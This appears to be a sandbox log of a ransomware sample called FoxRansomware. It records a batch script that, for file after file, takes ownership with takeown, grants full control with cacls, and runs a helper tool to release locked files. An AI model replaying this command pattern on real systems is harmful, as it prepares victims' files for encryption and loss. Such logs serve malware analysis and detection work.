    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" | PID 3492
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "form_responses.gif" -nobanner | PID 1684
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "form_responses.gif" -nobanner | PID 1020
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 892

C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:2564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:1152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵PID:2460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "review_email.gif" -nobanner3⤵PID:1724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "review_email.gif" -nobanner4⤵PID:3412
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:2248
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:1956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:2108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tr.gif" -nobanner3⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "tr.gif" -nobanner4⤵PID:2528
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:1980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:2852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:3112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:2384
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3192
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:528
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:3104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:2160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:2680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵
- Modifies file permissions
PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:976
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:3396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:3284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵
- Modifies file permissions
PID:216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "can.fca" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "can.fca" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:3060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:3196
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵
- Modifies file permissions
PID:3964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "usa03.ths" -nobanner3⤵PID:3956
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "usa03.ths" -nobanner4⤵PID:3552
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:2688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:1420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:2732
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:4016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵PID:3852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:3068
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:1612
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:2116
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:3660
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "device.png" -nobanner3⤵PID:1404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "device.png" -nobanner4⤵PID:3120
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:2524
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:3752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:560
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:4000
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tasks.xml" -nobanner3⤵PID:3512
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "tasks.xml" -nobanner4⤵PID:2912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:3796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:2296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:1776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "watermark.png" -nobanner3⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "watermark.png" -nobanner4⤵PID:1524
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:3460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:3292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:4080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:3020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "overlay.png" -nobanner3⤵PID:2360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "overlay.png" -nobanner4⤵PID:576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:2624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:2200
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵PID:2388
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:4032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MahjongMCE.png" -nobanner3⤵PID:816
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MahjongMCE.png" -nobanner4⤵PID:3716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:3884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:2876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:4044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:612
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵PID:1592
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:3664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵PID:3264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵PID:2224
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵PID:3452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵PID:3476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SolitaireMCE.png" -nobanner3⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SolitaireMCE.png" -nobanner4⤵PID:4092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:3136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Modifies file permissions
PID:2700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵PID:3344
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵PID:2604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:3400
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:1276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:3392
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:3604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:3440
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:2888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "eula.ini" -nobanner3⤵PID:2516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "eula.ini" -nobanner4⤵PID:1292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:1724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:2564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:2496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:2536
-
-
-
